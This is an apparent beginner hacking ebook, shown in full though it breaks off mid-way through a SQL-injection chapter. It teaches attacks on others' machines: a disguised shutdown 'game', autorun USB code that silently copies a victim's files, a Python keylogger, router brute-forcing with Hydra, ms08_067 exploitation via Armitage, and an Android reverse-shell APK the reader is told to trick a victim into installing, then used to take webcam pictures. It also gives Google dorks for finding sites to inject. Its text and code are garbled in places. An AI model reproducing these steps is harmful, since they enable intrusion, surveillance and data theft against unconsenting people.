DedicationAcknowledgmentsAbout the AuthorIntroductionTo who is this book aiming?How to use the bookChapter 1 Defining a HackerWho are hackersWhat motivates hackersBecoming a hackerDont ever go against the rules

Small summery aheadChapter 2 The Hackers ToolsBacktrackBackTrack's tools are organizedinto 12 categories:WiresharkHow it worksVadilia TORBattle against TorHow it worksGetting familiar with virusesTop 5 destructive computerviruses in History

KeyloggerHow it worksSmall summery aheadChapter 3 Creating virusBuilding your first virus fileCreating a virus to disable USBportsSetting up Borland C++Creating the C file that blocks usbportsCreating virus that unblocks theUSB ports.Virus nested in the stick

Getting started with TrojanThese actions can include:Trojan backdoorMake a simple Trojan HorseSmall summery aheadChapter 4 Cracking passwordsTypes of passwordsBasic administrator passwordresetCracking the encrypted PDFBypass windows PasswordCustom Made KeyloggerSmall summery ahead

Chapter 5 In Depth withBacktrackHistory of backtrackInstalling backtrackMetasploit using backtrackMetasploit TermsPeforming Metasploit toPenetrate Users in LANCracking Router Admin Pass andusrnameBreaking .rar & .zip usingBacktrackDoing some Script in BT

Backtrack was revolutionized toKaliKey featuresWhich one should I use?Hack in SmartphonesSmall summery aheadChapter 6 Website HackingHistory of SQL injectionUnderstanding SQL-injectionSimple SQL-injectionDoing a SQL-injectionIntroduction to PhishingPerforming Phishing

Writing the EmailSmall summery aheadChapter 7 Denial of Service inDepthWhat is Denial of ServiceHow Dos worksBuilding a DoS AttackDoS On a DNSSmall summery aheadChapter 8 Wireless hackHow security wifi is encryptedTools to crack a wifiCracking WEP wireless password

Crack Wi-Fi passwords inWindowsBypassing MAC Address filtersSmall summery aheadC h a p t e r 9 Defending fromHackersProtect yourself against DoSattacksProtecting the siteBest tool to remove the virusSecuring your operating systemSecuring your wirelessSmall summery ahead

Sad to say Farewell !

Dedication

This is book isdedicated to mybeloved grandmaand mother whotaught me to never

give up in anycircumstances. Andfor making me thegreat man that Imnow.

Acknowledgments

To make it clear Iwould like to give awarm gratitude to

myself who invented-this book and alsoto the forums aroundthe globe that gave agood feedback onthis book as well. The backtrack/kalicommunity thatfetch me theinformation onFreenode. A friendin California who

knew everythingabout networksecurity that gave methe enoughinformation.My editor thatpolished the bookfor me, without himthis book wouldhave not existed atall.

About the Author

Benjamin Jameshas an IT degree andworked as a softwaredeveloper at acompany for years. Also he helpedmany people withsecurity problemsand their computers. He knows how to

twist the languagesC++ , JAVA , C#and visual basic withno ease. Also, heenjoys hacking hesown computers timefrom time to seehow it goes. Hemade thousands ofarticles for the WorldWide Web teachingvarious subjects.And , in hes free

time when his headis not in IT he enjoysmaking 3D graphics.Currently, hesmaking a hugesoftware. Alsowriting 2 novels anda short film.

IntroductionAwesome forchoosing A Hackers

Life Starter. Thisbook covers themost essential toolsand information thata computer hackerneeds to know thesedays. Most of theexercises inside thisbook are things youneed to apply inyour everydayhacking life. Thatswhy I gathered all

the informationaround the world for these pastmonths to put theminside this book.

Im not saying that there is no informationout there on the internet or in other books,but what Im saying is that in this book Iwont let you waste your precious timereading, but only gain from it.

To who is this bookaiming?

Cyber-crime and hacking in someoneelses computer is completely against therule. No country around the world acceptsthis crime and if it had passed inside yourhead to do so you will need to carry theconsequences yourself beyond that. Iwont be responsible for your acts thatyou choose to use from my book.

But that doesnt mean you cant applythings from my book in real life. You seethings that I teach inside in this book arefor those that want to exceed their limitsand understand how the computer worksbetter and also to those who want to do itfor the fun of it or educational purposes.

No matter if you didnt know anythingabout computer or you know just a littlebit or even if you know everything aboutcomputers and their softwares this bookis for you

How to use the book

As mentioned before, this book is madefor only to be used on your owncomputers and so on (educationalpurposes only). It's easy to read, you cannavigate to any chapter you want dependson your needs, but if you want to read it inorder, that would be even better yet. Atthe end of each chapter there is a quicksummary you can pass on so that you cankeep the things fresh in your brain.

There are some universities around theglobe that started teaching how to hack.So if your attending to one of them andyou grabbed this book at some store thatmeans you have full advantage on gettinghigh scores.

Chapter 1 Defining aHacker

We will cover :* Who are hackers* What motivates hackers* Becoming a hacker* Dont ever go against therules

Hackers are simplypeople who engagein computer hackactivities. Also,called cyber-crime, ithas to do withinfiltrating system or

network. Anythingthat has to do withstoring digital bulkof information. There are twohackers white hat(good side) andblack hat (bad side).

Hackers areadvancedprogrammers whohave greatknowledge on both

hardware andsoftware. In the pastHackers wherecomputer users whowanted to explorethe world ofcomputer more in-depth . Butnowadays hackersare called peoplewho crack insidesomeone else'spersonal system and

gain information(criminal hackers),reasons why couldbe endless.

Who are hackers

White Hat

A white hat is a person who specialist insecurity. He uses hacking methods to findsecurity flaws that black hat may exploit.

Black Hat

A black hat is a person that tries toexploit computer personal financial gainor other malicious reasons. Mostly withbad intentions and to achieve somethingwrong. Mostly called crackers.

What motivates hackers

There are many types of hackers. Some

seek for money, like counterfeitingpassports, credit cards or hacking ATMnumbers. Others seek for freedom in otherwords they think that internet should becompletely free in every single aspect orfor their convenient, These hackers aremostly called Hacktivist.

And those who always try to impresstheir friends or hack them, these hackersmay not be as professionals as the others,but they still achieve what they want.They are known as Script Kiddies

Of course there are those who just do it totest themselves. Trying to push their

knowledge as much as they can, hackingtheir own machines and tell others how,did it.

But the biggest reason why hackers aremotivated to attack systems is forachieving technical challenges. Forexample, these black haters may find itreally challenging to create a virus thatcould affect billions of people.

Becoming a hacker

In becoming a hacker takes practice anddedication. Training yourself writingcodes and hacking with the necessarytools. These are the requirements youllprobably need to turn in a good hacker.

* Finding your motivation. If you donthave a solid purpose to hack a computeror a network, it would be harder for youto understand what to hack.

*No hacker is a hacker without theirhacking tools. In becoming a hacker you

will have to define which tools are not touse in order to execute the malicious act.

*Picking up some network books are alsoessential if you want to hack into network structures

*Choosing your programming language isalso one of the greatest move a younghacker can do. You see there are all sortsof programming languages that can helpyou access or damage a computer.

Dont ever go against therules

Hacking is someone else's computer isobviously violation. In desperation youmight think hacking inside a company or aperson might solve your personaltroubles. Indeed, it might but you willhave to remember security's (white hat)will always eventually find the source.

Not only because of that. Close your eyes

and put yourself inside someone elsesshoes and imagine they are accessing yourcomputer and formatting your PC orrobbing an important file from you. Thatwasn't so funny right?

That's why we recommend that you thinktwice before performing a malicious act.

In the law they're many kinds of penaltyfor those who are willing to lose three tofifth-ten years or more of their life.

Small summary ahead

* A white hat hacker breaks security fornon-malicious reasons, perhaps to testtheir own security system.

* A black hat hacker is a hacker whoviolates computer security for littlereason beyond maliciousness or forpersonal gain.

* Hacktivism is the act of hacking, orbreaking into a computer system, for a

politically or socially motivated purpose.

* But the biggest reason why hackers aremotivated to attack systems is forachieving technical challenges.

* Hacking is not tolerated and might letyou end up inside prison for years.

Chapter 2 The Hackers

Tools

We will cover :

* Backtrack

* Wireshark

* Vadilia Tor

* Getting familiar with viruses

* Keylogger

A hacking tool is a program designed tohelp with hacking, or software which canbe used for hacking achievements. Mostof these many software are open source.You can download them for free at theirweb site and use them for theexperimenting.

In this chapter we will do a lightintroduction on the few of the mostrecognized and strong hacking tools. Justtry to get familiar with them as much asyou can. Each time you master one of

these tools in the future you will increaseyour skills as a white/black hat hacker.

BacktrackIn this book we will use Backtrack asmuch as we can because it offers numbersof methods for cracking inside a systemwith ease. Backtrack is an open sourceoperating system that can be booted froma live CD or USB with no requiring forinstallation. Also, permanent installationto the network or HDD is easyachievable. In chapter 5 we will cover

more in depth with backtrack and its usefor sniffing and cracking insidesystems(see Figure 2-1).

Backtrack already comes with a numberof hacking tools or security tools alreadyinstalled inside the OS. Backtrack iswell known for cracking and hacking oncomputers.

BackTrack's tools areorganized into 12

categories: * InformationGathering* VulnerabilityAssessment* ExploitationTools* PrivilegeEscalation* MaintainingAccess

* ReverseEngineering* RFID Tools* Stress testing* Forensics* Reporting Tools* Services* Miscellaneous

In Figure 2-1

.shows you howbacktrack will looklike while searchingfor packets .

Wireshark

Wireshark is another tool used to sniffWIFI/online account passwords andpackets out there. Basically what it doesit captures packets from connections

inside the network. And, can be used forsecurity.

This small software is completely opensource, can be completely downloaded athttp://www.wireshark.org. Wiresharkwas made for finding networktroubleshooting, communications protocoldevelopment.

How it works

It's a network analyzer like a measuringdevice for examining inside a networkcable in real-time. (see Figure 2-2)

In Figure 2-2. shows you Wiresharkanalyzing the network LAN which can beused later to pick passwords.

Vadilia TOR

Tor is the worlds largest anonymity free

service. It is used by common people,hackers and tech-security. With Tor youcan easily hide your identity from others.It can be downloaded atwww.torproject.org

For example if you actually lived in theUnited States and you hacked or accessedin another user PC with Tor turned on. Ifthat user manages to track you back byyour Ip address, he would find out thatyou live China or any other country. WhatI am trying to say is that Tor cloaks yourIp for you fooling anyone else whostracking your location.

Battle against Tor

NSA has reportedly been trying to breakinto the Tor network for years. But Torkept going and providing their service upuntil this moment because it seems Tor isreally difficult to crackdown.

They did manage to get some informationout of it (small number of nodes) but stillwasn't enough though.

How it works

Tor routs internet traffic through severalonion server. From this you getprovided with anonymity. In the Torconfiguration file application can bedirected to the Tor network through socksproxy at local host. (see Figure 2-3)

In Figure 2-3 you can see Tor turned onproviding the great service.

Getting familiar withviruses

Creating a computer virus orunderstanding it, is one of the most

essential tool that a hacker could everhave achieved. You see a virus cannotonly be used to damage the computer, butit also can be used to monitor or takescreenshots of the infected operatingsystem remotely. And on the other handcan be used to fix things.

Top 5 destructivecomputer viruses inHistory

Here are the five top viruses used that Ithink that shook the world:

* Melissa

* MYDoom

* Storm

* ILOVEYOU

* Code Red

In the next Chapterwe will go a bit morein depth in how avirus is made andhow to make one.

Keylogger

Knowing how towork with akeylogger is also

useful especiallywhen you will needto monitor userspasswords. Basicallykey loggers are usedin IT organization tofind technicalproblems. But thereare those who uses itfor sniffing userspasswords andothers.

How it works

The word say it for itself, it logskeyboard keystrokes into a file , so it canbe later found out later. Most key-loggerstore the data inside local hard drive. Butthere are some that sends in through theinternet or the network remotely(seeFigure 2-4).

In Figure 2-4 .shows youhow backtrack will look likewhile searching for packets

Small summery ahead

* Backtrack comes with a number ofhacking and security tools alreadyinstalled with the OS.

* Wireshark is mostly used for capturingpackets from the network to have adetailed look over it still can be used for

hacking.

* Tor cloaks your ip and with that itmakes it difficult that they can find thereal ip

* Keylogger is used to monitor what theuser is typing on his keyboard.

Share on Facebook Tweetthis Guide

Chapter 3 Creating virus We will cover :* Building your first virusfile* Creating a virus to disableUSB ports* Virus nested in the stick* Getting started with Trojan* Make a simple Trojanvirus

Virus is the key formaking a hackersdream come true inmany ways.In the last chapterwe spoke a littleabout virus, but inthis chapterwe will cover moreabout it and in the

end you willunderstand how tomake one and how itoperates.

Building your first virusfile

Here you will create your first virus usingNotepad. The virus that we will becreating task is to shut down theoperating system and will be cloaked in agame icon. Give this virus to someonewho can handle this prank.

1. Start by opening notepad for thetexting .Start->All Programs->Accessories->Notepad

2. Type this piece of code in notepad:

@echo off

echo Message here.

shutdown -s -f -t 60 -c "type a messageyou want to appear here

3. Save the file as play this 3Dgame.bat, change the Save file type:when saving to All Files. And thensave. (see Figure 3-1)

In Figure 3-1 .shows you notepad SaveDialog opened and file type changed.

4. Go to the desktop and create a new

shortcut, locate for the bat file then next.

5. Name it play this 3D game andfinish.

6. Right click the shortcut->properties->Change Icon->choose one then OK.

Here the fake game App we createdshould be a virus that shutdowns theusers PC in a few seconds. And thatshow you created your very first virus byjust using Notepad.

Creating a virus to disableUSB ports

Your second virus you will need to createis to disable all USB ports of thecomputer. Here you will need to compilea C file into an executable one. Meaningyou will need to convert the .c into a .exefile.

Setting up Borland C++

1. First off you need to downloadBorland C++ 5.5 or above.

2. After you install Borland C++compiler, create two new TextDocuments in Notepad.

3. Type this in the first txt file thesefirst two lines:

-Ic:\Borland\Bcc55\include

-Lc:\Borland\Bcc55\lib

4. Save changes and close the file.Now rename the first file to bcc32.cfg.

5. In the second text file document typethis:

-Lc:\Borland\Bcc55\lib

6. Save changes and close the file. Nowrename the first file ilink32.cfg.

7. Put the two files in this directory:C:\Borland\BCC55\Bin

Creating the C file thatblocks usb ports

1. Open notepad and type code and saveit as block_usb.c

#include

void main()

{

system("reg addHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR\/v Start \/t REG_DWORD \/d 4 \/f");

2. Place the file inC:\Borland\BCC55\Bin

3. Now open command prompt(Start->Run->type cmd)

4. Type in:

cd C:\Borland\BCC55\Bin

5. Now compile the file by typing:

bcc32 block_usb.c

Creating virus thatunblocks the USB ports.

Now that your done you should have anblock_usb.exe file in the folder thathopefully blocks all the USB ports.

1. To enable all the USB ports backagain you should replace this code in theblock_usb.c file and compile again:

#include

void main()

{

system("reg addHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR\/v Start \/t REG_DWORD \/d 3 \/f");}

Virus nested in the stick

All the time I seevirus launching froma stick and startinfecting thecomputer. That Ifind really lame.What if you canmake a virus launchfrom the stick andmake it copy files tothe stick silently?Wont that be moreuseful? Well today

Ill show you how tomake one of those.

1. Insert you usb in the computer andnavigate in it.

2. Create an empty text file in the rootfolder of the stick and once your donelunch it. Type this code:

[autorun]

icon=drive.ico

open=launch.bat

action=Are you sure you want to run thegame for windows?

shell\open\command=launch.bat

3. Ok thats it, save the file with a .infextention

4. Choose an appealing icon for the fileand thats it.

5. Create another text file and in it andtype this:

@echo off

:: variables

/min

SET odrive=%odrive:~0,2%

set backupcmd=xcopy /s /c /d /e /h /i /r /y

echo off

%backupcmd%"%USERPROFILE%\pictures""%drive%\backup\My pics"

%backupcmd%"%USERPROFILE%\Favorites""%drive%\ backup \Favorites"

%backupcmd%"%USERPROFILE%\videos" "%drive%\backup \vids"

@echo off

cls

6. When youre done save it assomething but give it the extension .bat

7. We are almost done. Open anotherempty text file and type this:

CreateObject("Wscript.Shell").Run """"&

WScript.Arguments(0) & """", 0, False

8. Give the file a name I did hiddenand save it with the extension .vps

9. Now this is the last step. Like alwayscreate & open a text file and type this:

wscript.exe \invisible.vbs file.bat

10. When youre done save the fileas initiate with the extension .bat

11. Last but not least create a folderin the stick next to the other files andname it backup

12. Now it should be done. Pull outthe stick from the computer and insert itagain and the autoplay window should

pop-up. Then click on run. (see Figure 5-8)

In Figure 5-8 .shows you how the scriptis running in the terminal.

Note: It might give you an error messagebut thats ok all the files where copied tothe folder or they are being copied.

Getting started withTrojan

Most of us might think, or some that aTrojan is a virus, but its not. Trojan isjust like any other program also calledMalware. But that performs maliciousfunctions such as creating damage to thecomputer. They do not have the ability toreplicate themselves like virus. But witha Trojan you can control a computerremotely and execute virus in thecomputer.

These actions can include:

* Delete Data

* Blocking Data

* Modifying Data

* Copying Data

* Disrupting the performance ofcomputers or computer networks

Trojan backdoor

A Backdoor Trojan gives malicioususers remote control over the infectedcomputer. They enable the author to doanything they wish on the infectedcomputer including sending, receiving,launching, and deleting files, displayingdata, and shutdown the computer.

Make a simple TrojanHorse

Now we will create a Trojan virus thatkeeps opening command prompt 40x to1000x times, depends on how much youtype start. The user cant easily stopthem from opening. But if they have anantivirus the virus file can be detected.

1. Open notepad write start 50 x timesor much more then save test.bat and test

it in virtual box.

2. Make sure you dont have an antivirusin the virtual box operating system. Nowyour antivirus should detect this bat file.If not this could fill the users memory.

@echo off

A

Start

Start

Start

Start

Start

Start

Start

goto a

Small summary ahead

* There are those virus that can be used toshut down a computer

* Virus can be used to disable USB ports

* Trojan is not a virus but a program thatperforms maliciously

* Backdoor are Trojan that have control

on the user remotely

* Virus can be used to transfer files to thestick

Share on Facebook Tweetthis Guide

C h a p t e r 4 Crackingpasswords

We will cover:

* Types of passwords

* Basic administrator password reset.

* Crack the encrypted pdf

* Bypass windows password

* Custom made keylogger

Password cracking doesn't have toinvolve fancy tools, but it's a fairlytedious process. If the target doesn't lockyou out after a specific number of tries,you can spend an infinite amount of timetrying every combination of alphanumericcharacters. It's just a question of time andbandwidth before you break into asystem.

Types of passwords

Dictionary- A file of words is run againstuser accounts, and if the password is asimple word, it can be found prettyquickly.

Hybrid - A common method utilized byusers to change passwords is to add anumber or symbol to the end. A hybridattack works like a dictionary attack, butadds simple numbers or symbols to thepassword attempt.

Brute force - The most time-consuming,but comprehensive way to crack a

password. Every combination ofcharacter is tried until the password isbroken.

Basic administratorpassword reset1. Go to Start->open Run-> then writecmd. Or Start->And search for commandprompt then enter.

2. To view the available user seeFigure 4-1)inside the operating systemtype in:

net user

In Figure 4-1 . Here shows you the usersinside the computer in cmd

3. Now type :

net user Administrator *

you write net user again and theadministrator account this time itsAdministrator

4. After then type in the new passwordtwice. After then it should be okay for youto enter the administrator account with thenew password.

Cracking the encryptedPDF

Removing passwords from pdf files canbe sometimes frustrating especially whenyou lost a password or you found it frees o me w h e r e . A-PDF RestrictionsRemover is a great tool for cracking thepassword. It is free to download and canbe found in Google (If you enter the exactname) (see Figure 4-2)

In Figure 4-2 .shows you how A-PDFRestriction is looking when its running

1. When you download and install A-PDF Restrictions Remover, you should beable to right click the restricted pdf fileand choose Remove Restrictions orRemove Restriction & Save as..

Bypass windowsPassword

Bypassing the windows password hasbecome one of the most common things inthe IT industry and in the normal life,maybe it is because you lost yourpassword or you found the PC for freethrown in the streets and you need thepassword to proceed in the computer.

Here I will show you a way to bypasswindows password using a USB stick orCD.

1. Go to this link:http://ophcrack.sourceforge.net/download.phpand download ophcrack LiveCD-> Burnthe iso.

2. Reboot the computer and boot it from the cd an choose Ophcrack LiveCD Graphics mode(automode) (seeFigure 4-2)

In Figure 4-2 .shows you OphcrackLiveCD running from the cd or stick.

When it loads and open, it will ask youwhich partition to open. Type 0

4. Wait for a moment and the crackedpassword will appear next to theprotected user(see Figure 4-3)

In Figure 4-3 .shows you how backtrackwill look like while searching for packets

Custom Made Keylogger

Keylogger doesnt actually crack apassword but it monitors what passwordsthe victim is typing. Lets see how toprogram a keylogger.

1. Start navigating to python.org. Therein the download section download thelatest version of python. (see Figure 5-8)

In Figure 5-8 .shows you how the scriptis running in the terminal.

2. Once it finished downloading go to:http://sourceforge.net/projects/pyhook/files/

Download the latest version. Now installit.

3. Now navigate to :www.sourceforge.net/projects/pywin32and download it and give it a install.

Note: All of these tools are needed to be

in the same version. In order for them towork properly. My hook 1.5x requirespython 2.7

4. Now launch the IDLE(Python GUI)by searching the name in start and the python shell will launchitself.

5. Type in those python code inside theapp:

import win32api

import win32console

import win32gui

import pythoncom, pyHook

win =win32console.GetConsoleWindow()

win32gui.ShowWindows(win,0)

def OnKeyboardEvent(event):

if event.Ascii==5:

_exit(1)

if event.Ascii != 0 or 8:

f=open(c:\output.txt,w)

buffer=f.read()

f.close()

f=open(c:\output.txt,w)

keylogs=chr(event.Ascii)

if event.Ascii==13:

keylogs=/n

buffer += keylogs

f.write(buffer)

f.close()

hm = pyHook.HookManager()

hm.KeyDown = OnKeyboardEvent

hm.HookKeyboard()

pythoncom.PumpMessages()

6. Save the file asmy_own_keylogger.py and launch it

7. Now that your made-software isrunning, you can start testing it by going to

your email account or any other accountand enter your username and password.

8. When you think you have enoughinformation press Ctrl+I to stop the app

9. Go to the output.txt file and examineit to see what you retrieved.

Note: In our case we saved the output.txtin the C drive root folder.

Small summary ahead

* A-PDF Restictions Remover is a toolfor cracking password of PDF

* Ophcrack is best software used to

bypass the windows password

* There are three types of passwordcracking Dictionary,Hybrid,Brute Force.

* A keylogger can be custom made usingpython

Chapter 5 In Depth withBacktrack

We will cover:

* History of Backtrack

* Installing backtrack.

* Metasploit using backtrack

* Cracking router admin pass andusername

* Breaking .rar & .zip using backtrack

* Doing some script in BT

* Backtrack was revolutionized to Kali

* Hack in smartphones

Backtrack is the number #1 penetrationhacking operating system that's out therefor your experiments and fun stuff. Itbasically narrows all the toolsnecessary to hack and do some securitywith devices ,files ,operating systems,software and websites.

History of backtrackBacktrack was originated from two

distributions and its intention was forpenetration testing. Mati Aharoni asecurity consultant developed WHAX, alunix based distribution.

Max Moser made a Live CD that is basedon Knoppix who included over 300 toolsorganized. And Backtrack itself is acombination of Knoppix an WHAX.

Installing backtrack

Backtrack is an operating system that caneither be running from a Live CD or it

also can be installed on the hard disk.Both options have their advantages.Where one can be fast used as temporaryspace on the HDD and the other one thatcan permanently stay on the HDD andused anytime. We will be using virtualbox to install backtrack.

1. Boot backtrack iso in virtualbox(recommended to use 30 gb and 1.5ram)

2. Choose the Press enter on BacktrackText Default Boot Text Mode (seeFigure5 -1)

In Figure 5-1 .shows you how backtracklive cd menus look like

3. Now in the bash prompt window typein:

startx

4. And hit Enter. To open the graphicaluser interface operating system.

5. Now to start installing we need todouble click Install Backtrack on theDesktop.

6. Choose your language(thenforward),Select your Region and Timezone (forward),and let the checkbox onerase and use the entire disk And thenclick on install.

When you finished restarting it the logincommand screen will appear as this. (seeFigure 5-2)

In Figure 5-2 .Hereit shows you thelogin section ofbacktrack.

7 . Fill in thebit login: Root 8 . Fill in the

password: toor

9 . And to startbacktrack to thedesktop write: startx

Metasploit usingbacktrack

Did it happen to pass through your thickskull what a hacker could do by justknowing your ip address?Yes, He couldget a complete access to your computerwith no ease. Well it takes just a coupleof minutes.. Maybe for the simple reasonthe victim didn't update one of hissoftware's.

Metasploit is the hacker best friend. It isone of the most powerful ways for hackinto others. Its easy, fast, and always

works. We will use our companionBacktrack for the Metasploiting.

Metasploit Terms

Vulnerability InformationDisclosure (A weakness inside thesystem)

Exploit (Software that takesadvantage of the vulnerability)

Overflow (Error when a program

tries to store too much data)

Payload (Code or program that runson the system after exploitation)

Shellcode(code used as a payload)

Peforming Metasploit toPenetrate Users in LAN

1. First off run Backtrack to the desktop.And open the terminal app. From there type in:

cd /pentest/exploits/framework3

If that doesnt work. Try this one:

cd /pentest/exploits/framework2.

2. Once your inside that directory youtype in :

svn update

What this does is it lets you it lets youensure you have the latest version of MFand Armitage.

3. Lets open the software called

Armitage by tying in the terminal:Armitage. And click connect when the dialog pops up. And YES to start RPCserver. (see Figure 5-3)

In Figure 5-3.showsyou the Armitagedialog ready to startconnecting

4. Once it isopen change DBDriver option topostgresql. Letthe DB ConnectString the same

and click StartMSF. It will startprocessing fewthings to the weband open thesoftware itself.Which may looklike this(seeFigure 5-4)

In Figure 5-4. Hereis Armitate runningand ready for somemetasploting

5. Now go toHost->NmapScan->QuickScan(OS derect)Here you canscan or import

host in yournetwork usingNmap. (seeFigure 5-5)

In Figure 5-5. Here I navigated in theNmap Scan section.

6. Enter the Ip range you think that theuser might be in for example from 30 to40. And Ok.

Look at this 192.168.1.30/40 whichmeans It will look for all the users from30 to 40. The Nmap scanning could takesome time, depends on the IP range in the

network. Over here you can see the scanin progress. You can see all the ports ofthe OS in your network.

7. When its finished a message willcome up saying Scan is complete. ClickOk.

.

8. And then you will see all theavailable host computers here. You canorganize them by right clicking gray areaand Layout->Stack.

Now youll need to find the attacksthroughout the available ports on thehosts. When you do find the vulnerability,you can initiate an exploit to the computerto make a Meterpreter session.

9. Now go to: Attacks->Find Attacks->by port

10. Now right click on one of thecomputers you found earlier and go to :

Attack->smb->ms08_067_netapi

11. When the Attack configuration popsup, leave the targets to 0=>AutomaticTargeting. And then click Launch.

Wait for few seconds and the hostcomputer icon will be turned reddish.

That means that a session is made on thathost. Right now you can either takescreenshots of the host computer ornavigate in the folders. In other wordsfrom this moment you have moreprivilege on the host than before.

12. To take screenshot of the hostcomputer, right click on the icon and;Meterpreter 1->Explore->Screenshot. And there you have it.

13. And to Explore inside the victimscomputer.. Meterpreter 1->Explore->Browse Files.

Cracking Router Admin

Pass and usrname

Sometimes you might be forgetting yourrouter password or you want to access theadmin password in that case backtrackalso has a tool to do so. Here, I will walkyou through on how to sniff the routerpassword step-by-step.

1. Run Backtrack to the desktop andthen run the terminal.

2. To Make sure if you have gedit(gedit is a text editor) installed on yourbacktrack.

Type in:

gedit.

(If its not installed type in: apt-getinstall gedit)

3. Once gedit is open save it as anempty file named passwd.list inside the

folder ./code/ in root.

4. Type in:

dhclient eth0

It will give you a list of information. Notethat where is says:

DHCPACK of [your ip] from [router ip]

Your router ip is there write that ip

somewhere so it can be used later.

5. Then type in the terminal:

hydra l admin p /code/passwd.lst -0ns -f v [router ip] http-get /

And then enter.

Wait for a moment until the attack isfinished. And there you have the

password.

6. If you would like to test if it works,type in terminal: firefox . That will lunchfirefox.

7. In the url navigator type in:http://[your_router_ip]/

Fill in the username and password. Andyou found and Hualaa! Youre in. (seeFigure 5-6)

In Figure 5-6 . Here Im showing youhow I hacked my own router and got inthe control panel.

Breaking .rar & .zip usingBacktrack

In chapter 3 we discussed on how toremove password with many smallsoftware. Now Im going to show youhow to break a zip password usingbacktrack. First have your securedcompressed file on your backtrack

desktop.

1. What you would like to do now is goto

start->Backtrack->Privilage Escalation->Passwords Attacks->Offline Attacks->fcrackzip(see Figure 5-7)

In Figure 5-7 . Here Im showing youhow I navigated to fcrackzip

A terminal will open with these followingoptions to choose from:

-b brute force-D dictionary Attack-B benchmark-c charset characterset-h help-V validate-p init-password string-l length min-max-u use-unzip-m method num

-2 modulo r/m

Here are how the chart works:

-b > bruteforce-c a > charset lower case alphabets-l 1-6 > length of expected password

2. Im planning to do a brute force rightnow so Ill write:

fcrackzip -b -c a -l 1-6/root/Desktop/crack me.zip

And now press enter and backtrack willfast show you the password after a fewattempts. But sometimes it may take years.

Doing some Script in BT

Here I want you to get a bit familiar withbacktrack scripting.. What I want to do isshow are the possibilities in Backtrack.

1. Run Backtrack to the Desktop andrun the terminal.

2. Type in:

gedit

3. And type this in gedit and when yourfinished save as hacker

#!/bin/bash

echo "Im a hacker who does things foreducational purposes only and nothingmore."

4. Lets go back in the terminal andtype:

chmod u+x hacker

./hacker

5. Once we are this far is time to runthe script to see how it looks like. To doso we must be in the same folder wecreated the script. I saved mine in the root

folder(see Figure 5-8)

.

In Figure 5-8 .shows you how the script isrunning in the terminal.

Backtrack wasrevolutionized to Kali

Backtrack 6 was never going to come outand have new features. But apparently thesame coders and people who createdbacktrack re-created backtrack with newfeatures and named it Kali. Still manypeople gave it many other names for itlike: Backtrack six, Reborn of

backtrack. But in the end the name waschanged because it had too many features.

Key features

Everything is the same as backtrack so itwill be very easy for you to get used to it.The only deference is that it has moretools and features like:

* Kali now supports much more chipsetsfor wireless devices compared tobacktrack 5.

* Kali has no longer a pentest directoryfor you to launch your application from it.The new way to do it does not require foryou to navigate into a directory. All youhave to do is type in the name of theapplication inside the terminal from anylocation. If youre not familiar with thenames you can still navigate with the GUInavigator

* Kali runs on smartphones and tabletwith no problem

* With Kali compared to Backtrack itwont be needed.

Which one should I use?

That was not a fair question, Kali issimply a newer version of backtrack. Itssimply based on option on which one touse, rather than facts or references. Bothof them offer the same magnitude ofhacking tools and both are similar.

Hack in Smartphones

I will be using Kali to plant a blackdoorseed inside a smartphone so you can laterdo metasploting with it. It Just takescouple of seconds to do this and its fun. Itested mine on my android device and itworked like a charm.

1. First of run Kali to the desktop andrun terminal

2. I will use this command: msfpayloadandroid/meterpreter/reverse_tcp lhost=[your ip] lport= [port that you want touse] R > /root/Desktop/files.apk so in mycase I would type:

msfpayloadandroid/meterpreter/reverse_tcplhost=192.168.2.17 lport= 8080 R >/root/Desktop/files.apk

3. Now that we created a apk file thatwas stored on my desktop. Open anotherterminal and type in:

msfconsole

4. Since we will do things remotely weneed to configure Kali for this adjustmentso type in:

use exploit/multi/handler

set payloadandroid/meterpreter/reverse_tcp

set lhost 192.168.2.17

set lport 8080

exploit

5. Ok now we are ready. Now youllhave to figure a way to have the victimdownload file.apk to shes/his phone ortablet. Just find a free web host or share itin your dropbox. Ill just leave it to yourimagination.

6. Now once its downloaded andopened in the phone you can start playingin his/shes phone. We will first of listthe files in the phone by typing:

ls

7. To view what apps are running youcan type in:

ps

8. And now lets take some picturesfrom the cam by typing :

webcam_snap 1

A tip to view the available cams youshould type: webcam_list.

That should list all the cam on the deviceand is helpful for when choosing between1 or 2 with the webcam_snap [number]

command. (see Figure 5-8)

In Figure 5-8.shows you how thescript is running inthe terminal.

Small summary ahead

Backtrack/Kali is an operating system thatis made to do penetrating testing.

With backtrack you can find the router

password and username

Metasploit is a great way for computerpenetration in the LAN and alsosmartphones

Backtrack can be used for breakingpasswords of compressed files

Share on Facebook Tweetthis Guide

C h a p t e r 6 WebsiteHacking

We will cover:

History of SQL injection

Understanding SQL injection

Simple SQL-injection

Introduction to Phishing

Performing Phishing

Sometimes you may want to hack yourown website you made to see how itgoes. Or maybe a friend or a client askedyou to test his website to see if itsvulnerable and website hacking mightcome in handy.

History of SQL injectionThe language SEQUEL was developed bythe IBM corporation. Relational Softwarewhich now is known as Oracle hasintroduced in 1979 the greatimplementation of SQL. After many test,it was available to start using through1979 and 1983.

From that language people startedimplementing malicious codes and one ofthem was SQL injection to attackwebsites and applications. In 2007 SQL

was considered to be one of the top 10vulnerabilities of 2007 and 2010 and in 2013was number one attack methods.

Understanding SQL-injectionSQL injection is used to gain entries fromthe available public entry to the database.SQL injection commands are filled in theform instead of the normal account login.Once the SQL commands are in thedatabase it can also pinpoint the otherdatabases in the same server. Suitablesites to hack with SQL injection are forms

of contact, feedback fields, shoppingcards and many more. Most of the fieldsallow for SQL commands.

Necessary things

The necessary things that a business needsto be hacked is based on two factors: sizeof the business, age, update status,patches of the applications and thenumber of staff. It depends on what youare about to attack and your tools are welldesigned.

Types of SQL injection attacks

* Authentication Bypass

* Information Disclosure

* Compromised Data Integrity

* Compromised Availability of Data

* Remote Command Execution

Simple SQL-injectionSQL injection can be

used in forms ofcontact, feedbackfields, shoppingcards and manymore. Most of thefields allow for SQLcommands. Butnowadays its reallydifficult to do anSQL injection insome site becausemost of them comereally tight protected

from SQL-injection.

Doing a SQL-injection

1. First off go to Google.com. There youwill search for vulnerable sites. To findthem type one of these keywords

inurl:pageid=

inurl:index.php?id=

inurl:/login.php

2. Once you searched one of those

keywords in google you will find a list ofvulnerable sites. Your task will be tovisit these sites one by one to check theirvulnerability.

3. When your inside add a single quotesat the end of the site url and hit Enter. Forexample:

